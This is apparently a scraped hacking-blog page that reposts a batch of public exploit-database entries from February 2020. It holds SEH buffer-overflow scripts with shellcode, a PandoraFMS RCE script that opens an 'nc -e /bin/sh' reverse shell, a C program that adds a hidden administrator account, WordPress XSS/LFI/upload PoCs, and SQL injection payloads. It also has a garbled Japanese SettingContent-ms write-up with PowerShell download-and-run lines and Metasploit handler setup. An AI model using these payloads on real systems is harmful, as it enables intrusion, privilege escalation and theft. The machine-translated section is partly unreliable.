#Exploit Title: MyVideoConverter Pro 3.14 - 'Output Folder' Buffer Overflow
#Exploit Author : ZwX
#Exploit Date: 2020-02-11
#Vendor Homepage : http://www.ivideogo.com/
#Tested on OS: Windows 10 v1803
#Social: twitter.com/ZwX2a
## Steps to Reproduce: ##
#1. Run the python exploit script, it will create a new file with the name "exploit.txt".
#2. Just copy the text inside "exploit.txt".
#3. Start the program. In the new window click "Options" > "Settins" .
#4. Now paste the content of "exploit.txt" into the field: "Output Folder" > Click "..."
#5. The calculator runs successfully
#!/usr/bin/python
from struct import pack
buffer = "\x41" * 268
nseh = "\xeb\x06\xff\xff"
seh = pack("<I",0x10045ebb)
#0x10045ebb : pop edi # pop ebx # ret | {PAGE_EXECUTE_READ} [mysubtitle.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.1 (C:\Program Files\MyVideoConverter Pro\mysubtitle.dll)
shellcode = ""
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"
payload = buffer + nseh + seh + shellcode
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863170288
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: HP System Event Utility - Local Privilege Escalation
# Author: hyp3rlinx
# Date: 2020-02-11
# Vendor: www.hp.com
# Link: https://hp-system-event-utility.en.lo4d.com/download
# CVE: CVE-2019-18915
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/HP-SYSTEM-EVENT-UTILITY-LOCAL-PRIVILEGE-ESCALATION.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.hp.com
[Product]
HP System Event Utility
The genuine HPMSGSVC.exe file is a software component of HP System Event Utility by HP Inc.
HP System Event Utility enables the functioning of special function keys on select HP devices.
[Vulnerability Type]
Local Privilege Escalation
[CVE Reference]
CVE-2019-18915
[Security Issue]
The HP System Event service "HPMSGSVC.exe" will load an arbitrary EXE and execute it with SYSTEM integrity.
HPMSGSVC.exe runs a background process that delivers push notifications.
The problem is that HP Message Service will load and execute any arbitrary executable named "Program.exe"
if found in the users c:\ drive.
Path: C:\Program Files (x86)\HP\HP System Event\SmrtAdptr.exe
Two Handles are inherit, properties are Write/Read
Name: \Device\ConDrv
This results in arbitrary code execution persistence mechanism if an attacker can place an EXE in this location
and can be used to escalate privileges from Admin to SYSTEM.
HP has/is released/releasing a mitigation: https://support.hp.com/us-en/document/c06559359
[References]
PSR-2019-0204
https://support.hp.com/us-en/document/c06559359
[Network Access]
Local
[Disclosure Timeline]
Vendor Notification: October 7, 2019
HP PSRT "product team will address the issue in next release" : January 13, 2020
HP advisory and mitigation release : February 10, 2020
February 11, 2020 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
# Exploit Title: MyVideoConverter Pro 3.14 - 'TVSeries' Buffer Overflow
# Exploit Author : ZwX
# Exploit Date: 2020-02-11
# Vendor Homepage : http://www.ivideogo.com/
# Tested on OS: Windows 10 v1803
# Social: twitter.com/ZwX2a
## Steps to Reproduce: ##
#1. Run the python exploit script, it will create a new file with the name "Shell.txt".
#2. Just copy the text inside "Shell.txt".
#3. Start the program. In the new window click "Add" > "Convert DVD" > "TVSeries" .
#4. Now paste the content of "Shell.txt" into the field: "Video Folder" > Click "..."
#5. The calculator runs successfully
#!/usr/bin/python
from struct import pack
buffer = "\x41" * 268
nseh = "\xeb\x06\xff\xff"
seh = pack("<I",0x10039291)
#0x10039291 : pop ecx # pop ebx # ret 0x04 | {PAGE_EXECUTE_READ} [mysubtitle.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.1 (C:\Program Files\MyVideoConverter Pro\mysubtitle.dll)
shellcode = ""
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"
payload = buffer + nseh + seh + shellcode
try:
f=open("Shell.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Tile: Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting
# Author: mehran feizi
# Category: webapps
# Date: 2020-02-12
# vendor home page: https://wordpress.org/plugins/tutor/
===================================================================
Vulnerable page:
/Quiz.php
===================================================================
Vulnerable Source:
473: echo echo $topic_id;
447: $topic_id = sanitize_text_field($_POST['topic_id']);
===================================================================
Exploit:
localhost/wp-content/plugins/tutor/classes/Quiz.php
$_POST('topic_id') = <script>alert('mehran')</script>
=================================================================================
# Tile: Wordpress Plugin tutor.1.5.3 - Local File Inclusion
# Author: mehran feizi
# Category: webapps
# Date: 2020-02-12
# vendor home page: https://wordpress.org/plugins/tutor/
===================================================================
Vulnerable page:
/instructors.php
===================================================================
Vulnerable Source:
3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET);
5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php";
7: include include $include_file;
requires:
4: if(!empty($sub_page))
6: if(file_exists($include_file))
===================================================================
Exploit:
localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
=================================================================================
contact me:
telegram: @MF0584
gmail: mehranfeizi13841384@gmail.com
===================================================================
Vulnerable page:
/instructors.php
===================================================================
Vulnerable Source:
3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET);
5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php";
7: include include $include_file;
requires:
4: if(!empty($sub_page))
6: if(file_exists($include_file))
===================================================================
Exploit:
localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
=================================================================================
# Exploit Title: OpenTFTP 1.66 - Local Privilege Escalation
# Exploit Author: boku
# Date: 2020-02-12
# Vendor Homepage: https://sourceforge.net/projects/tftp-server/
# Software Link: https://sourceforge.net/projects/tftp-server/files/tftp%20server%20single%20port/OpenTFTPServerSPInstallerV1.66.exe/download
# Version: 1.66
# Tested On: Windows 10 (32-bit)
# About:
# "MultiThreaded TFTP Server Open Source Freeware Windows/Unix for PXEBOOT, firmware load, support tsize, blksize, timeout Server Port Ranges,
# Block Number Rollover for Large Files. Runs as Service/daemon. Single Port version also available."
# Downloads: 43,284 This Week - https://sourceforge.net/projects/tftp-server/
# Vulnerability Details:
# On Windows, Open TFTP Server v1.66, suffers from insecure file & folder permissions.
# This allows a low-privilge, local attacker to escalate their permissions to Administrator;
# by replacing the 'TFTPServer' service binary with a maliciously-crafted, binary executable.
# The TFTP Server runs as an 'Auto_Start' Service, with 'LocalSystem' priviledges, after the
# default installation. After the attacker has planted the malicious binary, the code will
# be executed with System priviledges on the next boot of the windows device. See PoC below for details.
## Service Information (there is also an Unquoted Service Path)
C:\>sc qc TFTPServer
SERVICE_NAME: TFTPServer
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\OpenTFTPServer\OpenTFTPServerSP.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Open TFTP Single Port Server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
## Insecure Folder Permission
C:\OpenTFTPServer BUILTIN\Administrators:(OI)(CI)(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
## Insecure File/Service Permission
C:\OpenTFTPServer\OpenTFTPServerSP.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
## Local Privilege Escalation Proof of Concept
#0. Download & install Open TFTP Server v1.66
#1. Create low privileged user & change to the user
C:\Users\lowPrivUser>net user lowprivuser | findstr /i "Membership Name" | findstr /v "Full"
User name lowPrivUser
Local Group Memberships *Users
Global Group memberships *None
C:\>whoami
mycomputer\lowprivuser
#2. Move the Service EXE to a new name
C:\OpenTFTPServer>move OpenTFTPServerSP.exe ~OpenTFTPServerSP.exe
1 file(s) moved.
#3. Create malicious binary on kali linux
1) Download dependencies
root@kali# apt install gcc-mingw-w64-i686 wine64 -y
2) Add Admin User C Code
root@kali# cat addAdmin.c
#include<windows.h>
int main(void){
system("net user hacker mypassword /add");
system("net localgroup Administrators hacker /add");
WinExec("C:\\OpenTFTPServer\\~OpenTFTPServerSP.exe",0);
return 0;
}
3) Compile Code
root@kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o OpenTFTPServerSP.exe
#4. Transfer created 'OpenTFTPServerSP.exe' to the Windows Host
#5. Move the created 'OpenTFTPServerSP.exe' binary to the 'C:\OpenTFTPServer\' Folder
C:\>move C:\Users\lowPrivUser\Desktop\OpenTFTPServerSP.exe C:\OpenTFTPServer\
1 file(s) moved.
C:\>dir C:\OpenTFTPServer | findstr "OpenTFTPServerSP.exe"
02/12/2020 05:59 PM 288,659 OpenTFTPServerSP.exe
02/12/2020 06:38 PM 221,560 ~OpenTFTPServerSP.exe
#6. Reboot the Computer
#7. Look at that new Admin
C:\Users\lowPrivUser>net users hacker | findstr "Local name active"
User name hacker
Account active Yes
Local Group Memberships *Administrators *Users
C:\Users\lowPrivUser>net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
boku
hacker
# Exploit Title: PANDORAFMS 7.0 - Authenticated Remote Code Execution
# Date: 2020-02-12
# Exploit Author: Engin Demirbilek
# Vendor homepage: http://pandorafms.org/
# Version: 7.0
# Software link: https://pandorafms.org/features/free-download-monitoring-software/
# Tested on: CentOS
# CVE: CVE-2020-8947
#!/bin/python
'''
PANDORAFMS 7.0 Authenticated Remote Code Execution x4
This exploits can be edited to exploit 4x Authenticated RCE vulnerabilities exist on PANDORAFMS.
incase default vulnerable variable won't work, change the position of payload to one of the following ip_src, dst_port, src_port
Author: Engin Demirbilek
Github: github.com/EnginDemirbilek
CVE: CVE-2020-8947
'''
import requests
import sys
if len(sys.argv) < 6:
print "Usage: ./exploit.py http://url username password listenerIP listenerPort"
exit()
url = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
payload = '";nc -e /bin/sh ' + sys.argv[4] + ' ' + sys.argv[5] + ' ' + '#'
login = {
'nick':user,
'pass':password,
'login_button':'Login'
}
req = requests.Session()
print "Sendin login request ..."
login = req.post(url+"/pandora_console/index.php?login=1", data=login)
payload = {
'date':"",
'time':"",
'period':"",
'interval_length':"",
'chart_type':"",
'max_aggregates':"1",
'address_resolution':"0",
'name':"",
'assign_group':"0",
'filter_type':"0",
'filter_id':"0",
'filter_selected':"0",
'ip_dst':payload,
'ip_src':"",
'dst_port':"",
'src_port':"",
'advanced_filter':"",
'aggregate':"dstip",
'router_ip':"",
'output':"bytes",
'draw_button':"Draw"
}
print "[+] Sendin exploit ..."
exploit = req.post(url+"/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0",cookies=req.cookies, data=payload, headers={
'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Encoding':'gzip, deflate',
'Content-Type':'application/x-www-form-urlencoded'})
if exploit.status_code == 200:
print "[+] Everything seems ok, check your listener. If no connection established, change position of payload to ip_src, dst_port or src_port."
else:
print "[-] Couldn't send the HTTP request, try again."
# Tile: Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload
# Author: mehran feizi
# Category: webapps
# Date: 2020-02-11
# vendor home page: https://wordpress.org/plugins/contact-form-7/
Vulnerable Source:
134: move_uploaded_file move_uploaded_file($file['tmp_name'], $new_file))
82: $file = $_FILES[$name] : null;
132: $new_file = path_join($uploads_dir, $filename);
122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir);
121: $uploads_dir = wpcf7_upload_tmp_dir();
131: $filename = wp_unique_filename($uploads_dir, $filename);
122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir);
121: $uploads_dir = wpcf7_upload_tmp_dir();
128: $filename = apply_filters('wpcf7_upload_file_name', $filename, $file['name'], $tag);
126: $filename = wpcf7_antiscript_file_name ($filename);
125: $filename = wpcf7_canonicalize ($filename, 'as-is');
124: $filename = $file['name'];
82: $file = $_FILES[$name] : null;
82: $file = $_FILES[$name] : null;
78: ⇓ function wpcf7_file_validation_filter($result, $tag)
Exploit:
<?php
$shahab="file.jpg";
$ch = curl_init("http://localhost/wordpress/wp-content/plugins/contact-form-7/modules/file.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('zip'=>"@$shahab"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
?>
Location File:
http://localhost/wordpress/wp-content/plugins/contact-form-7/file.jpg
# Tile: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure
# Author: mehran feizi
# Category: webapps
# Date: 2020-02-12
# vendor home page: https://wordpress.org/plugins/wordfence/
==============================================================================
Vulnerable Source:
5662: readfile readfile($localFile);
5645: $localFile = ABSPATH . preg_replace('/^(?:\.\.|[\/]+)/', '', sanitize_text_field($_GET['file']));
=================================================================================
Exploit:
localhost/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=[LFD]
=================================================================================
# Title : WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion
# Author : mehran feizi
# Vendor : https://wordpress.org/plugins/ultimate-member/
# Category : Webapps
# Date : 2020-02-11
# Vendor home page: https://wordpress.org/plugins/ultimate-member/
Vulnerable Page:
/class-admin-upgrade.php
Vulnerable Source:
354: if(empty($_POST['pack'])) else
356: include_once include_once $this->packages_dir . DIRECTORY_SEPARATOR . $_POST['pack'] . DIRECTORY_SEPARATOR . 'init.php';
Exploit:
localhost/wp-content/plugins/worprees plugin bug dar/ultimate-member/includes/admin/core/class-admin-upgrade.php
$_POST('pack')=<script>alert('xss')</script>
0x00 SettingContent-MSファイルの紹介
.SettingContent-MSはWindows 10で導入されたファイルタイプです。そのコンテンツはXML形式で記述されており、主にWindows設定ページのショートカットを作成するために使用されます。 Windows 10の下流。 settentcontent-msの接尾辞を備えたファイル。システムは、このクラスファイルのパスがコントロールパネルの関連ディレクトリにあるかどうかを判断するのではなく、コントロールパネル設定に関連するコントロールパネル設定に使用されるファイルのディープリンクタグで指定されたプログラムを直接実行し、ユーザーがシステムのディレクトリでそのようなファイルを実行したり、ネットワークからダウンロードした慎重に設計されたファイルを実行したりします。 SettingContent-MSファイルは、その中で指定された悪意のあるプログラムオブジェクトを直接実行し、任意のコード実行をもたらします。
このファイルには、パラメーターを含むバイナリファイルを使用して実行するディープリンクタグが含まれています。これは問題を引き起こす可能性があります。攻撃者は、CMD.exeやPowershell.exeなどのバイナリファイルを指すDeeplink要素を使用して.settingContent-MSファイルを作成でき、シェルコマンドの実行を提供します。
0x01 Windows Defender AV ASRルール
Windows Defender AV ASRルールは、主にマルウェアをエクスプロイットするコンピューターやアプリケーションに感染するのを防ぐために設計されています。 Windows 10、バージョン1709以降、およびWindows Server 2016で導入されました。WindowsDefenderの以前のバージョンはすべてASRルールでは利用できませんでした。
Windows 10バージョン1703〜1803およびWindows Serverバージョン1709から1803から始めます。次の図は、Windows Defender AV ASRルールがAttackSurfacereductionRules_IDS関数ルールに付属していることを示しています。
また、このバージョン以下の10240では、Windows Defender AV ASRルールにはastationSurfacereductionRules_idsがありません
注:ある時点で、搾取の失敗はファイルの場所(デフォルトのポリシー設定)に依存するため、POCファイルを次のディレクトリにコピーして実行するだけです。 (デフォルトのパスを変更すると、管理者の特権を使用してコマンドscmwrap.exe -installを実行できます)
c: \ uses \ [user] \ appdata \ local \ packages \ windows.immersivecontrolpanel_cw5n1h2txyewy \ localstate \ indexed \ settings \ [言語] \
0x02脆弱性の再発
1。簡単なテストポップアップ計算機
1。テストPCファイルを次のディレクトリに入れます。
c: \ users \ admin(user)
\ appdata \ local \ packages \ windows.immersivecontrolpanel_cw5n1h2txyewy \ localstate \ indexed \ settings \ zh-cn \ directory
2。クリックしてPOCファイルをテストします。
?xmlバージョン='1.0'エンコード='utf-8'?
pcsettings
SearchAbleContent XMLNS='http://Schemas.microsoft.com/search/2013/SettingContent'
ApplicationInformation
appidwindows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel/appid
Deeplink%Windir%\ System32 \ cmd.exe /c calc.exe /deeplink
ICON%Windir%\ System32 \ Control.exe/Icon
/ApplicationInformation
設定
pageid/pageid
HOSTID {12B1697E-D3A0-4DBC-B568-CCF64A3F934D}/HOSTID
/settingidentity
設定情報
説明@shell32.dll、-4161/description
keywords@shell32.dll、-4161/キーワード
/設定情報
/SearchAbleContent
/pcsettings
その他のディープリンク…/deeplinkは、poc:を置き換えることができます
1。Windir%\ System32 \ cmd.exe /C 'C: \ Program Files \ Internet Explorer \ iexplore.exe' -K https://www.backlion.org/
2。SystemRoot%\ System32 \ WindowsPowerShell \ V1.0 \ PowerShell.Exe -Wind Hidden -Noni -NONOGO -COMM '(New -Object System.Net.WebClient).DownLoadFile(' 3http://192.168.225.129/PWN.EXE ' $ env3360Appdata+'\ svrcheck.exe'); Start-Process $ env:Appdata '\ svrcheck.exe'; exit-pssession; '
3。PowerShell-WindowsStyle Hidden(new-Objectsystem.net.WebClient)downloadFile( 'https://www.xxx.com/test.exe'、%appdata%\ rundll32.exe '); start-cess'%appdata%\ rundll32.exe ''
4。WMICOS GET /format:'https://gist.githubusercontent.com/caseysmithrc/68924cabbeca1285D2941298A5B91C24/78065CA63504C9A0F411071377FBE861DE487E44D4D4D4D4D4D4D4D4D4D4D4D4D4D4/
3. [テスト]をクリックします。コンテンツMSを設定して計算をポップアップします
2。オフィスに埋め込み、計算機をポップアップします
1。単語を作成します。ここでは、Offcie2007を例として使用します
2。ファイルによって作成されたポイント挿入オブジェクト選択
4.アイコンをダブルクリックして開くと、計算機がポップアップします。
3.Kaliリバウンドシェル
スクリプトを使用してアドレスをダウンロードする:
https://raw.githubusercontent.com/backlion/demo/master/auto_settingcontent-ms.py
1.スクリプトを実行するauto_settingcontent-ms.py kaliの下で、リスニングIPアドレス(kaliネイティブホストIP)とポートに記入します
root@kali2018:/opt#python auto_settingcontent-ms.py
2。TEST.SETTINGCONTENT-MSは現在のディレクトリで生成され、生成されたライセンスが/var/www/htmlディレクトリに自動的にコピーされます。
5。Apacheサービスをオンにします。
root@kali2018:/opt#service apache2 start
6. MSFを起動してから、IPアドレスを設定し、リスニングポートとペイロードを設定します
MSFはExploit/Multi/Handlerを使用します
MSF Exploit(Multi/Handler)Payload Windows/MeterPreter/Reverse_httpsを設定します
MSF Exploit(Multi/Handler)にオプションが表示されます
MSF Exploit(Multi/Handler)セットLHOST 10.250.117.10
MSF Exploit(Multi/Handler)Set LPort 5555
MSF Exploit(Multi/Handler)Exploit
7.生成されたtest.settingContent-msをコピーしてから、新しいtest.docドキュメントを作成し、データを挿入します
8.次に、[test.docx]をクリックして、ドキュメントを開き、アイコンをクリックしてバウンスします。
9. Kaliの下にリバウンドターゲットシステムシェルが表示されます。
0x03脆弱性はバージョン
に影響します32ビットシステム用のWindows 10バージョン1703
4343885
セキュリティの更新
リモートコード実行
重要
4338826
X64ベースのシステム用Windows 10バージョン1703
4343885
セキュリティの更新
リモートコード実行
重要
4338826
32ビットシステム用のWindows 10バージョン1709
4343897
セキュリティの更新
リモートコード実行
重要
4338825
64ビットシステム用のWindows 10バージョン1709
4343897
セキュリティの更新
リモートコード実行
重要
4338825
32ビットシステム用のWindows 10バージョン1803
4343909
セキュリティの更新
リモートコード実行
重要
4338819
X64ベースのシステム用Windows 10バージョン1803
4343909
セキュリティの更新
リモートコード実行
重要
4338819
Windows Server、バージョン1709(サーバーコアインストール)
4343897
セキュリティの更新
リモートコード実行
重要
4338825
Windows Server、バージョン1803(サーバーコアインストール)
4343909
セキュリティの更新
リモートコード実行
重要
4338819
0x04脆弱性防御の提案
ファイアウォールや電子メールゲートウェイで実行して、settingContent-MSファイルをブロックするのが最善です。さらに、グループポリシーを使用して強制することを検討する必要があります。SettingContent-MSは、メモ帳(https://montour.co/2016/09/group-policy-force-js-files/)で開くことを禁止されています。
0x05参照リンク
https://www.t00ls.net/thread-47622-1-1.html
https://hk.saowen.com/a/18EA08A24EFD7D58C9D24CE69CAD41AAC8E1535026D266A3E6CED826D77777A341
https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39
https://github.com/joesecurity/scmwrap
https://github.com/sscyber0/deeplink_reverse_tcp
# Title: phpMyChat Plus 1.98 - 'pmc_username' SQL Injection
# Date: 2020-02-13
# Exploit Author: J3rryBl4nks
# Vendor Homepage: http://ciprianmp.com/latest/
# Software Link: https://sourceforge.net/projects/phpmychat/files/phpMyChat_Plus/
# Version MyChat Plus 1.98
# Tested on Windows 10/Kali Rolling
# The phpMyChat Plus 1.98 application is vulnerable to Sql Injection
# (Boolean based blind, Error-based, time-based blind) on the deluser.php page
# through the pmc_user parameter.
# POC code:
# Capture the request through Burpsuite:
POST /plus/deluser.php HTTP/1.1
Host: HOSTNAME
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://HOSTNAME/plus/deluser.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Connection: close
Cookie: CookieLang=english; temp=temp; CookieUsername=testing; CookieRoom=Public%2BRoom%2B1; CookieRoomType=1; CookieStatus=r; PHPSESSID=0srffkdt9nu2jis443pp9nh3i9
Upgrade-Insecure-Requests: 1
L=english&Link=&LIMIT=0&pmc_username=test&pmc_password=test&login_form=Log+In
# Then use sqlmap to get the user tables:
sqlmap -r deleteuserlogin.req --level=5 --risk=3 --dbms=mysql --tamper=unmagicquotes -D DBNAME --dump -T c_reg_users -p pmc_username
Parameter: pmc_username (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: L=english&Link=&LIMIT=0&pmc_username=test' AND 9736=(SELECT (CASE WHEN (9736=9736) THEN 9736 ELSE (SELECT 2847 UNION SELECT 9983) END))-- qEHq&pmc_password=test&login_form=Log In
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: L=english&Link=&LIMIT=0&pmc_username=test' OR (SELECT 7708 FROM(SELECT COUNT(*),CONCAT(0x7170627a71,(SELECT (ELT(7708=7708,1))),0x7162627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ShDx&pmc_password=test&login_form=Log In
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: L=english&Link=&LIMIT=0&pmc_username=test' AND (SELECT 5588 FROM (SELECT(SLEEP(5)))wWnk)-- FHPh&pmc_password=test&login_form=Log In
# PoC for the SWAPGS attack ([CVE-2019-1125](https://nvd.nist.gov/vuln/detail/CVE-2019-1125))
This holds the sources for the SWAPGS attack PoC publicly shown at Black Hat USA, 2019.
## Contents
* leakgsbkva - variant 1 (look for random values in kernel memory; limited to PE kernel image header)
* leakgsbkvat - variant 2 (extract random values from kernel memory; limited to PE kernel image header)
* whitepaper
* Black Hat USA 2019 presentation
## Prerequisites
1. Visual Studio 2015
2. Unpatched Windows x64 (7 or newer)
## Authors
* Andrei Vlad LUȚAȘ
* Dan Horea LUȚAȘ
## Additional resources
[Video Recording of presentation at Black Hat USA, 2019](https://www.youtube.com/watch?v=uBPry7jcfBE)
Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48071.zip
# Exploit Title: EPSON EasyMP Network Projection 2.81 - 'EMP_NSWLSV' Unquoted Service Path
# Discovery by: Roberto Piña
# Discovery Date: 2020-02-13
# Vendor Homepage: https://epson.com/support/easymp-network-projection-v2-86-for-windows
# Software Link :https://ftp.epson.com/drivers/epson16189.exe
# SEIKO EPSON CORP
# Tested Version: 2.81
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Home x64 en
# Step to discover Unquoted Service Path:
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "EPSON" | findstr /i /v """
EMP_NSWLSV EMP_NSWLSV C:\Program Files (x86)\EPSON Projector\EasyMP Network Projection V2\EMP_NSWLSV.exe Auto
C:\>sc qc "EMP_NSWLSV"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: EMP_NSWLSV
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\EPSON Projector\EasyMP Network Projection V2\EMP_NSWLSV.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : EMP_NSWLSV
DEPENDENCIES : RPCSS
SERVICE_START_NAME : LocalSystem
#Exploit:
# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.
# Exploit Title: SprintWork 2.3.1 - Local Privilege Escalation
# Exploit Author: boku
